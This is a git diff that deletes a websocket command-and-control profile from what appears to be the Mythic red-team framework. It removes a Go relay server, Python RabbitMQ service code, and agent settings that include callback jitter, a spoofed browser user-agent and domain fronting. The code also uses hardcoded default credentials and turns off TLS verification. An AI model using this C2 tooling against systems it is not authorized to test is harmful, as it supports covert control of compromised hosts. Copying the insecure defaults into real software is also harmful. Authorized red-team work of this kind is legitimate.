- - \ No newline at end of file diff --git a/C2_Profiles/websocket/c2_code/server b/C2_Profiles/websocket/c2_code/server deleted file mode 100755 index 3b371a7ec..000000000 Binary files a/C2_Profiles/websocket/c2_code/server and /dev/null differ diff --git a/C2_Profiles/websocket/c2_code/src/build_help b/C2_Profiles/websocket/c2_code/src/build_help deleted file mode 100644 index 2e0c93ad7..000000000 --- a/C2_Profiles/websocket/c2_code/src/build_help +++ /dev/null @@ -1,8 +0,0 @@ -To build the sever: - -go get github.com/gorilla/websocket -go get github.com/kabukky/httpscerts -go build -tags=websocket main.go - -this outputs a binary called "main" -move this to ../server \ No newline at end of file diff --git a/C2_Profiles/websocket/c2_code/src/main.go b/C2_Profiles/websocket/c2_code/src/main.go deleted file mode 100644 index 315276faa..000000000 --- a/C2_Profiles/websocket/c2_code/src/main.go +++ /dev/null @@ -1,35 +0,0 @@ -package main - -import ( - "encoding/json" - "io/ioutil" - "log" - "os" - - "./pkg/servers" -) - -var cf *os.File -func main() { - cf, err := os.Open("config.json") - - if err != nil { - log.Println("Error opening config file ", err.Error()) - os.Exit(-1) - } - - config, _ := ioutil.ReadAll(cf) - - c2config := servers.C2Config{} - err = json.Unmarshal(config, &c2config) - if err != nil { - log.Println("Error in unmarshal call for config ", err.Error()) - os.Exit(-1) - } - - // start the server instance with the config - c2server := servers.NewInstance().(servers.Server) - - c2server.Run(c2config) - -} diff --git a/C2_Profiles/websocket/c2_code/src/pkg/servers/server.go b/C2_Profiles/websocket/c2_code/src/pkg/servers/server.go deleted file mode 100644 index 6e7fbc321..000000000 --- a/C2_Profiles/websocket/c2_code/src/pkg/servers/server.go +++ /dev/null @@ -1,34 +0,0 @@ -package servers - -// C2Config - struct for server configuration -type C2Config struct { - BindAddress string `json:"bindaddress"` - SocketURI string `json:"websocketuri"` - SSLKey string `json:"sslkey"` - SSLCert string `json:"sslcert"` - UseSSL bool `json:"usessl"` - Defaultpage string `json:"defaultpage"` - Logfile string `json:"logfile"` - Debug bool `json:"debug"` -} - -//Server - interface used for all c2 profiles -type Server interface { - ApfellBaseURL() string - SetApfellBaseURL(url string) - PostResponse(taskid string, output []byte) []byte - PostMessage(msg []byte) []byte - GetNextTask(apfellID string) []byte - Run(cf interface{}) -} - -//Message - struct definition for messages between clients and the server -type Message struct { - Tag string `json:"tag"` - Client bool `json:"client"` - Data string `json:"data"` -} - -func NewInstance() interface{} { - return newServer() -} diff --git a/C2_Profiles/websocket/c2_code/src/pkg/servers/websocket.go b/C2_Profiles/websocket/c2_code/src/pkg/servers/websocket.go deleted file mode 100644 index 09abbf8e5..000000000 --- a/C2_Profiles/websocket/c2_code/src/pkg/servers/websocket.go +++ /dev/null @@ -1,298 +0,0 @@ -// +build websocket - -package servers - -import ( - "bytes" - "crypto/tls" - "fmt" - "io/ioutil" - "log" - "net/http" - "os" - "strings" - - "github.com/gorilla/websocket" - "github.com/kabukky/httpscerts" -) - -type WebsocketC2 struct { - BaseURL string - BindAddress string - SSL bool - SocketURI string - Defaultpage string - Logfile string - Debug bool -} - -var upgrader = websocket.Upgrader{} - -func newServer() Server { - return &WebsocketC2{} -} - -func (s *WebsocketC2) SetBindAddress(addr string) { - s.BindAddress = addr -} - -//ApfellBaseURL - Returns the base url for apfell -func (s WebsocketC2) ApfellBaseURL() string { - return s.BaseURL -} - -//SetApfellBaseURL - Sets the base url for apfell -func (s *WebsocketC2) SetApfellBaseURL(url string) { - s.BaseURL = url -} - -//SetSocketURI - Set socket uri -func (s *WebsocketC2) SetSocketURI(uri string) { - s.SocketURI = uri -} - -func (s *WebsocketC2) PostMessage(msg []byte) []byte { - return s.htmlPostData("", msg) -} - -func (s WebsocketC2) GetNextTask(apfellID string) []byte { - //place holder - //url := fmt.Sprintf("%sapi/v%s/agent_message", s.ApfellBaseURL(), ApiVersion) - return make([]byte, 0) -} - -func (s WebsocketC2) PostResponse(taskid string, output []byte) []byte { - //urlEnding := fmt.Sprintf("api/v%s/agent_message", ApiVersion) - return output -} - -//postRESTResponse - Wrapper to post task responses through the Apfell rest API -func (s *WebsocketC2) postRESTResponse(urlEnding string, data []byte) []byte { - return make([]byte, 0) -} - -//htmlPostData HTTP POST function -func (s *WebsocketC2) htmlPostData(urlEnding string, sendData []byte) []byte { - url := s.ApfellBaseURL() - //log.Println("Sending POST request to url: ", url) - s.Websocketlog(fmt.Sprintln("Sending POST request to: ", url)) - - req, _ := http.NewRequest("POST", url, bytes.NewBuffer(sendData)) - contentLength := len(sendData) - req.ContentLength = int64(contentLength) - tr := &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - } - client := &http.Client{Transport: tr} - resp, err := client.Do(req) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error sending POST request: %s", err.Error())) - return make([]byte, 0) - } - - if resp.StatusCode != 200 { - s.Websocketlog(fmt.Sprintf("Did not receive 200 response code: %d", resp.StatusCode)) - return make([]byte, 0) - } - - defer resp.Body.Close() - - body, err := ioutil.ReadAll(resp.Body) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error reading response body: %s", err.Error())) - return make([]byte, 0) - } - - return body -} - -//htmlGetData - HTTP GET request for data -func (s *WebsocketC2) htmlGetData(url string) []byte { - //log.Println("Sending HTML GET request to url: ", url) - tr := &http.Transport{ - TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, - } - client := &http.Client{Transport: tr} - var respBody []byte - - req, err := http.NewRequest("GET", url, nil) - if err != nil { - s.Websocketlog(fmt.Sprintf("Error creating http request: %s", err.Error())) - return make([]byte, 0) - } - - resp, err := client.Do(req) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Error completing GET request: %s", err.Error())) - return make([]byte, 0) - } - - if resp.StatusCode != 200 { - s.Websocketlog(fmt.Sprintf("Did not receive 200 response code: %d", resp.StatusCode)) - return make([]byte, 0) - } - - defer resp.Body.Close() - - respBody, _ = ioutil.ReadAll(resp.Body) - - return respBody - -} - -func (s *WebsocketC2) SetDebug(debug bool) { - s.Debug = debug -} - -//GetDefaultPage - Get the default html page -func (s WebsocketC2) GetDefaultPage() string { - return s.Defaultpage -} - -//SetDefaultPage - Set the default html page -func (s *WebsocketC2) SetDefaultPage(newpage string) { - s.Defaultpage = newpage -} - -//SocketHandler - Websockets handler -func (s WebsocketC2) SocketHandler(w http.ResponseWriter, r *http.Request) { - //Upgrade the websocket connection - upgrader.CheckOrigin = func(r *http.Request) bool { return true } - conn, err := upgrader.Upgrade(w, r, nil) - if err != nil { - s.Websocketlog(fmt.Sprintf("Websocket upgrade failed: %s\n", err.Error())) - http.Error(w, "websocket connection failed", http.StatusBadRequest) - return - } - - s.Websocketlog("Received new websocket client") - - go s.manageClient(conn) - -} - -func (s *WebsocketC2) manageClient(c *websocket.Conn) { - -LOOP: - for { - // Wait for the client to send the initial checkin message - m := Message{} - err := c.ReadJSON(&m) - - if err != nil { - s.Websocketlog(fmt.Sprintf("Read error %s. Exiting session", err.Error())) - return - } - - var resp []byte - if m.Client { - s.Websocketlog(fmt.Sprintf("Received agent message %+v\n", m)) - resp = s.PostMessage([]byte(m.Data)) - } - - reply := Message{Client: false} - - if len(resp) == 0 { - reply.Data = string(make([]byte, 1)) - } else { - reply.Data = string(resp) - } - - reply.Tag = m.Tag - - if err = c.WriteJSON(reply); err != nil { - s.Websocketlog(fmt.Sprintf("Error writing json to client %s", err.Error())) - break LOOP - } - - } - - c.Close() - -} - -//ServeDefaultPage - HTTP handler -func (s WebsocketC2) ServeDefaultPage(w http.ResponseWriter, r *http.Request) { - log.Println("Received request: ", r.URL) - log.Println("URI Path ", r.URL.Path) - if (r.URL.Path == "/" || r.URL.Path == "/index.html") && r.Method == "GET" { - // Serve the default page if we receive a GET request at the base URI - http.ServeFile(w, r, s.GetDefaultPage()) - } - - http.Error(w, "Not Found", http.StatusNotFound) - return -} -//Run - main function for the websocket profile -func (s WebsocketC2) Run(config interface{}) { - cf := config.(C2Config) - s.Debug = cf.Debug - s.SetDefaultPage(cf.Defaultpage) - s.SetApfellBaseURL(os.Getenv("MYTHIC_ADDRESS")) - s.SetBindAddress(cf.BindAddress) - s.SetSocketURI(cf.SocketURI) - - // Handle requests to the base uri - http.HandleFunc("/", s.ServeDefaultPage) - // Handle requests to the websockets uri - http.HandleFunc(fmt.Sprintf("/%s", s.SocketURI), s.SocketHandler) - - // Setup all of the options according to the configuration - if !strings.Contains(cf.SSLKey, "") && !strings.Contains(cf.SSLCert, "") { - - // copy the key and cert to the local directory - keyfile, err := ioutil.ReadFile(cf.SSLKey) - if err != nil { - log.Println("Unable to read key file ", err.Error()) - } - - err = ioutil.WriteFile("key.pem", keyfile, 0644) - if err != nil { - log.Println("Unable to write key file ", err.Error()) - } - - certfile, err := ioutil.ReadFile(cf.SSLCert) - if err != nil { - log.Println("Unable to read cert file ", err.Error()) - } - - err = ioutil.WriteFile("cert.pem", certfile, 0644) - if err != nil { - log.Println("Unable to write cert file ", err.Error()) - } - } - - if cf.UseSSL { - err := httpscerts.Check("cert.pem", "key.pem") - if err != nil { - s.Websocketlog(fmt.Sprintf("Error for cert.pem or key.pem %s", err.Error())) - err = httpscerts.Generate("cert.pem", "key.pem", cf.BindAddress) - if err != nil { - log.Fatal("Error generating https cert") - os.Exit(1) - } - } - - s.Websocketlog(fmt.Sprintf("Starting SSL server at https://%s and wss://%s", cf.BindAddress, cf.BindAddress)) - err = http.ListenAndServeTLS(cf.BindAddress, "cert.pem", "key.pem", nil) - if err != nil { - log.Fatal("Failed to start raven server: ", err) - } - } else { - s.Websocketlog(fmt.Sprintf("Starting server at http://%s and ws://%s", cf.BindAddress, cf.BindAddress)) - err := http.ListenAndServe(cf.BindAddress, nil) - if err != nil { - log.Fatal("Failed to start raven server: ", err) - } - } -} - -//Websocketlog - logging function -func (s WebsocketC2) Websocketlog(msg string) { - if s.Debug { - log.Println(msg) - } -} diff --git a/C2_Profiles/websocket/mythic/C2ProfileBase.py b/C2_Profiles/websocket/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/C2_Profiles/websocket/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/C2_Profiles/websocket/mythic/MythicBaseRPC.py b/C2_Profiles/websocket/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/C2_Profiles/websocket/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/C2_Profiles/websocket/mythic/MythicCallbackRPC.py b/C2_Profiles/websocket/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/C2_Profiles/websocket/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/C2_Profiles/websocket/mythic/__init__.py b/C2_Profiles/websocket/mythic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/C2_Profiles/websocket/mythic/c2_functions/C2_RPC_functions.py b/C2_Profiles/websocket/mythic/c2_functions/C2_RPC_functions.py deleted file mode 100644 index 6332e7fc2..000000000 --- a/C2_Profiles/websocket/mythic/c2_functions/C2_RPC_functions.py +++ /dev/null @@ -1,11 +0,0 @@ -from C2ProfileBase import * -import MythicCallbackRPC - -# request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} -# must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message -async def test(request): - response = RPCResponse() - response.status = RPCStatus.Success - response.response = "hello" - #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response \ No newline at end of file diff --git a/C2_Profiles/websocket/mythic/c2_functions/__init__.py b/C2_Profiles/websocket/mythic/c2_functions/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/C2_Profiles/websocket/mythic/c2_functions/websocket.py b/C2_Profiles/websocket/mythic/c2_functions/websocket.py deleted file mode 100644 index 393546be5..000000000 --- a/C2_Profiles/websocket/mythic/c2_functions/websocket.py +++ /dev/null @@ -1,70 +0,0 @@ -from C2ProfileBase import * - - -class Websocket(C2Profile): - name = "websocket" - description = "Websocket C2 Server for poseidon" - author = "@xorrior" - is_p2p = False - is_server_routed = False - mythic_encrypts = True - parameters = [ - C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="ws://127.0.0.1", - verifier_regex="^(ws|wss)://[a-zA-Z0-9]+", - ), - C2ProfileParameter( - name="USER_AGENT", - description="User Agent", - default_value="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", - required=False, - ), - C2ProfileParameter( - name="AESPSK", - description="Base64 of a 32B AES Key", - default_value="", - required=False, - ), - C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="encrypted_exchange_check", - description="Perform Key Exchange", - choices=["T", "F"], - parameter_type=ParameterType.ChooseOne, - required=False, - ), - C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", - default_value="", - required=False, - ), - C2ProfileParameter( - name="ENDPOINT_REPLACE", - description="Websockets Endpoint", - default_value="socket", - required=False, - ), - C2ProfileParameter( - name="callback_jitter", - description="Callback Jitter in percent", - default_value="37", - verifier_regex="^[0-9]+$", - required=False, - ), - C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="8081", - verifier_regex="^[0-9]+$", - required=False, - ), - ] diff --git a/C2_Profiles/websocket/mythic/c2_service.sh b/C2_Profiles/websocket/mythic/c2_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/C2_Profiles/websocket/mythic/c2_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/C2_Profiles/websocket/mythic/mythic_service.py b/C2_Profiles/websocket/mythic/mythic_service.py deleted file mode 100755 index dde56b77c..000000000 --- a/C2_Profiles/websocket/mythic/mythic_service.py +++ /dev/null @@ -1,410 +0,0 @@ -#!/usr/bin/env python3 -import aio_pika -import os -import time -import sys -import subprocess -import _thread -import base64 -import json -import socket -import asyncio -import pathlib -import traceback -from C2ProfileBase import * -from importlib import import_module, invalidate_caches -from functools import partial - -credentials = None -connection_params = None -running = False -process = None -thread = None -hostname = "" -output = "" -exchange = None -container_files_path = None - - -def deal_with_stdout(): - global process - global output - while True: - try: - for line in iter(process.stdout.readline, b""): - output += line.decode("utf-8") - except Exception as e: - print("Exiting thread due to: {}\n".format(str(e))) - sys.stdout.flush() - break - - -def import_all_c2_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("c2_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("c2_functions." + pathlib.Path(x).stem, package=None) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", routing_key=""): - global exchange - try: - message_body = aio_pika.Message(message.encode()) - await exchange.publish(message_body, routing_key=routing_key) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - sys.stdout.flush() - - -async def callback(message: aio_pika.IncomingMessage): - global running - global process - global output - global thread - global hostname - global container_files_path - with message.process(): - # messages of the form: c2.modify.PROFILE NAME.command - try: - command = message.routing_key.split(".")[3] - username = message.routing_key.split(".")[4] - server_path = container_files_path / "server" - # command = body.decode('utf-8') - if command == "start": - if not running: - # make sure to start the /Apfell/server in the background - os.chmod(server_path, mode=0o777) - output = "" - process = subprocess.Popen( - str(server_path), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - cwd=str(container_files_path), - ) - thread = _thread.start_new_thread(deal_with_stdout, ()) - time.sleep(3) - process.poll() - if process.returncode is not None: - # this means something went wrong and the process is dead - running = False - await send_status( - message="Failed to start\nOutput: {}".format(output), - routing_key="c2.status.{}.stopped.start.{}".format( - hostname, username - ), - ) - output = "" - else: - running = True - await send_status( - message="Started with pid: {}...\nOutput: {}".format( - str(process.pid), output - ), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Already running...\nOutput: {}".format(output), - routing_key="c2.status.{}.running.start.{}".format( - hostname, username - ), - ) - output = "" - elif command == "stop": - if running: - try: - process.kill() - process.communicate() - except Exception as e: - pass - try: - thread.exit() - except Exception as e: - pass - running = False - await send_status( - message="Process killed...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="Process not running...\nOld Output: {}".format(output), - routing_key="c2.status.{}.stopped.stop.{}".format( - hostname, username - ), - ) - output = "" - # make sure to stop the /Apfell/server in the background - elif command == "status": - if running: - await send_status( - message="Output: {}".format(output), - routing_key="c2.status.{}.running.status.{}".format( - hostname, username - ), - ) - output = "" - else: - await send_status( - message="C2 is not running", - routing_key="c2.status.{}.stopped.status.{}".format( - hostname, username - ), - ) - elif command == "get_config": - try: - path = container_files_path / "config.json" - file_data = open(path, "rb").read() - except Exception as e: - file_data = b"File not found" - encoded_data = json.dumps( - { - "filename": "config.json", - "data": base64.b64encode(file_data).decode("utf-8"), - } - ) - await send_status( - message=encoded_data, - routing_key="c2.status.{}.{}.get_config.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "writefile": - try: - message = json.loads(message.body.decode("utf-8")) - file_path = container_files_path / message["file_path"] - file_path = file_path.resolve() - if container_files_path not in file_path.parents: - response = { - "status": "error", - "error": "trying to break out of path", - } - else: - file = open(file_path, "wb") - file.write(base64.b64decode(message["data"])) - file.close() - response = {"status": "success", "file": message["file_path"]} - except Exception as e: - response = {"status": "error", "error": str(e)} - await send_status( - message=json.dumps(response), - routing_key="c2.status.{}.{}.writefile.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - elif command == "sync_classes": - try: - import_all_c2_functions() - # c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "running" if running else "stopped", username - ), - ) - else: - print("Unknown command: {}".format(command)) - sys.stdout.flush() - except Exception as e: - print("Failed overall message processing: " + str(e)) - sys.stdout.flush() - - -async def sync_classes(): - try: - import_all_c2_functions() - c2profile = {} - for cls in C2Profile.__subclasses__(): - c2profile = cls().to_json() - break - await send_status( - message=json.dumps(c2profile), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - except Exception as e: - await send_status( - message='{"message": "Error while syncing info: {}"}'.format( - str(traceback.format_exc()) - ), - routing_key="c2.status.{}.{}.sync_classes.{}".format( - hostname, "stopped", "" - ), - ) - - -async def rabbit_c2_rpc_callback( - exchange: aio_pika.Exchange, message: aio_pika.IncomingMessage -): - with message.process(): - request = json.loads(message.body.decode()) - if "action" in request: - response = await globals()[request["action"]](request) - response = json.dumps(response.to_json()).encode() - else: - response = json.dumps( - {"status": "error", "error": "Missing action"} - ).encode() - try: - await exchange.publish( - aio_pika.Message(body=response, correlation_id=message.correlation_id), - routing_key=message.reply_to, - ) - except Exception as e: - print( - "Exception trying to send message back to container for rpc! " + str(e) - ) - sys.stdout.flush() - - -async def connect_and_consume_rpc(): - connection = None - global hostname - while connection is None: - try: - connection = await aio_pika.connect_robust( - host="127.0.0.1", - login="mythic_user", - password="mythic_password", - virtualhost="mythic_vhost", - ) - channel = await connection.channel() - # get a random queue that only the apfell server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("{}_rpc_queue".format(hostname)) - await channel.set_qos(prefetch_count=50) - try: - task = queue.consume( - partial(rabbit_c2_rpc_callback, channel.default_exchange) - ) - result = await asyncio.wait_for(task, None) - except Exception as e: - print("Exception in connect_and_consume .consume: {}".format(str(e))) - sys.stdout.flush() - except (ConnectionError, ConnectionRefusedError) as c: - print("Connection to rabbitmq failed, trying again...") - sys.stdout.flush() - except Exception as e: - print("Exception in connect_and_consume_rpc connect: {}".format(str(e))) - # print("Exception in connect_and_consume connect: {}".format(str(e))) - sys.stdout.flush() - await asyncio.sleep(2) - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = pathlib.Path( - os.path.abspath(main_config["container_files_path"]) - ) - container_files_path = container_files_path / "c2_code" - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(2) - try: - channel = await connection.channel() - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - queue = await channel.declare_queue("", exclusive=True) - await queue.bind( - exchange="mythic_traffic", routing_key="c2.modify.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=30) - print("Listening for c2.modify.{}.#".format(hostname)) - sys.stdout.flush() - task = queue.consume(callback) - await sync_classes() - task4 = asyncio.ensure_future(connect_and_consume_rpc()) - result = await asyncio.gather(task, task4) - # send_status(message="", routing_key="c2.status.{}.stopped.stop".format(hostname)) - except Exception as e: - print(str(traceback.format_exc())) - sys.stdout.flush() - - -async def heartbeat_loop(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the apfell server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="c2.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - -# start our service -loop = asyncio.get_event_loop() -loop.create_task(mythic_service()) -loop.create_task(heartbeat_loop()) -loop.run_forever() diff --git a/C2_Profiles/websocket/mythic/rabbitmq_config.json b/C2_Profiles/websocket/mythic/rabbitmq_config.json deleted file mode 100755 index 08581c01a..000000000 --- a/C2_Profiles/websocket/mythic/rabbitmq_config.json +++ /dev/null @@ -1,8 +0,0 @@ -{ - "username": "mythic_user", - "password": "mythic_password", - "virtual_host": "mythic_vhost", - "host": "127.0.0.1", - "name": "hostname", - "container_files_path": "/Mythic/" -} \ No newline at end of file diff --git a/Docker_Templates/Docker_C2_Profile_base_files/Dockerfile b/Docker_Templates/Docker_C2_Profile_base_files/Dockerfile deleted file mode 100755 index b2feaaac0..000000000 --- a/Docker_Templates/Docker_C2_Profile_base_files/Dockerfile +++ /dev/null @@ -1,9 +0,0 @@ -From python:3.6-jessie -RUN pip install aio_pika - -RUN mkdir /Mythic_service 2>/dev/null -COPY ["c2_service.sh", "/Mythic_service/c2_service.sh"] -RUN chmod +x /Mythic_service/c2_service.sh -WORKDIR /Mythic_service/ - -ENTRYPOINT ["/Mythic_service/c2_service.sh"] diff --git 